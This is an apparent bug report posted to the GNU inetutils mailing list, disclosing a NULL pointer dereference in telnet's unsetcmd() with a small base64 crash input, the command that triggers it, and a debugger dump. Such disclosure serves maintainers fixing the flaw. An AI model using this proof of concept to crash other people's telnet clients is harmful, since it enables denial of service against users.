bug-inetutils
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:12

From: AiDai
Subject: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227
Date: Thu, 23 Dec 2021 21:17:45 +0800
# NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

## Description

A NULL Pointer Dereference was discovered in unsetcmd() at inetutils/telnet/commands.c:1227. The vulnerability causes a segmentation fault and application crash.

**version**

```
./telnet --version
telnet (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc**

```
base64 poc
dQsiIA==
```

**command:**

```
./telnet < ./poc
```

**Result**

```
./telnet < ./poc
[3]    2387443 segmentation fault  ./telnet < ./poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
1227              *(ct->charp) = _POSIX_VDISABLE;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x55555557bee2 (line+2) ◂— 0x20 /* ' ' */
 RCX  0xfbad2098
 RDX  0x0
 RDI  0x55555557ab20 (Setlist+128) —▸ 0x555555571a7d ◂— 0x67756265640020 /* ' ' */
 RSI  0x555555571a7d ◂— 0x67756265640020 /* ' ' */
 R8   0x55555557bee0 (line) ◂— 0x200075 /* 'u' */
 R9   0x7c
 R10  0x555555572e4c ◂— 0x69626d413f00203e /* '> ' */
 R11  0x246
 R12  0x555555559d20 (_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
 RIP  0x55555555b592 (unsetcmd+717) ◂— mov    byte ptr [rax], 0
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x55555555b592 <unsetcmd+717>    mov    byte ptr [rax], 0
   0x55555555b595 <unsetcmd+720>    mov    rax, qword ptr [rbp - 0x20]
   0x55555555b599 <unsetcmd+724>    mov    rax, qword ptr [rax + 0x18]
   0x55555555b59d <unsetcmd+728>    movzx  eax, byte ptr [rax]
   0x55555555b5a0 <unsetcmd+731>    movzx  eax, al
   0x55555555b5a3 <unsetcmd+734>    mov    edi, eax
   0x55555555b5a5 <unsetcmd+736>    call   control                <control>

   0x55555555b5aa <unsetcmd+741>    mov    rdx, rax
   0x55555555b5ad <unsetcmd+744>    mov    rax, qword ptr [rbp - 0x20]
   0x55555555b5b1 <unsetcmd+748>    mov    rax, qword ptr [rax]
   0x55555555b5b4 <unsetcmd+751>    mov    rsi, rax
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/telnet/commands.c
   1222           (*ct->handler) (0);
   1223           printf ("%s reset to \"%s\".\n", ct->name, (char *) ct->charp);
   1224         }
   1225       else
   1226         {
 ► 1227           *(ct->charp) = _POSIX_VDISABLE;
   1228           printf ("%s character is '%s'.\n", ct->name,
   1229                   control (*(ct->charp)));
   1230         }
   1231     }
   1232   return 1;
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
01:0008│     0x7fffffffe038 ◂— 0x5555d867
02:0010│     0x7fffffffe040 —▸ 0x55555557ab20 (Setlist+128) —▸ 0x555555571a7d ◂— 0x67756265640020 /* ' ' */
03:0018│     0x7fffffffe048 —▸ 0x55555557bee0 (line) ◂— 0x200075 /* 'u' */
04:0020│     0x7fffffffe050 ◂— 0x0
05:0028│     0x7fffffffe058 —▸ 0x55555557b360 (cmdtab+256) —▸ 0x555555572e2f ◂— 0x6f74007465736e75 /* 'unset' */
06:0030│ rbp 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0
07:0038│     0x7fffffffe068 —▸ 0x55555555dab9 (command+550) ◂— test   eax, eax
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x55555555b592 unsetcmd+717
   f 1   0x55555555dab9 command+550
   f 2   0x55555555e3c8 main+776
   f 3   0x7ffff7db50b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
#1  0x000055555555dab9 in command (top=1, tbuf=0x0, cnt=0) at commands.c:3044
#2  0x000055555555e3c8 in main (argc=0, argv=0x7fffffffe220) at main.c:423
#3  0x00007ffff7db50b3 in __libc_start_main (main=0x55555555e0c0 <main>, argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308
#4  0x0000555555559d4e in _start ()
```

reply via email to
[Prev in Thread] Current Thread [Next in Thread]